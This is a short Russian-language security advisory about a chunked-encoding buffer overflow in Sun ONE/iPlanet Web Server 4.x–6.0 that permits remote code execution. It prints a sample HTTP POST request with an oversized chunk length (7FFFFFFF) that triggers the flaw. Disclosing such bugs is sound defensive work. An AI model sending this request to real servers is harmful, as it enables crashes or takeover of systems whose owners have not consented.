При обработке запросов, кодированных механизмом 'Chunked Encoding', Sun ONE/iPlanet не в состоянии должным образом вычислить необходимые размеры требуемого буфера. Удаленный атакующий может создать уродливую сессию, которая вызовет переполнение буфера. Уязвимость может использоваться для выполнения произвольного кода с системными привилегиями. 

Пример: 

POST /EEYE.html HTTP/1.1
Host: www.EEYE2002.com
Transfer-Encoding: chunked
Content-Length: 22
4
EEYE
7FFFFFFF
[DATA]

Уязвимость обнаружена в iPlanet E-Commerce Solutions iPlanet Web Server 4.x, iPlanet E-Commerce Solutions iPlanet Web Server 4.1-4.1sp9, iPlanet E-Commerce Solutions iPlanet Web Server 6.0-6.0sp2, Sun ONE Web Server 4.1-6.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии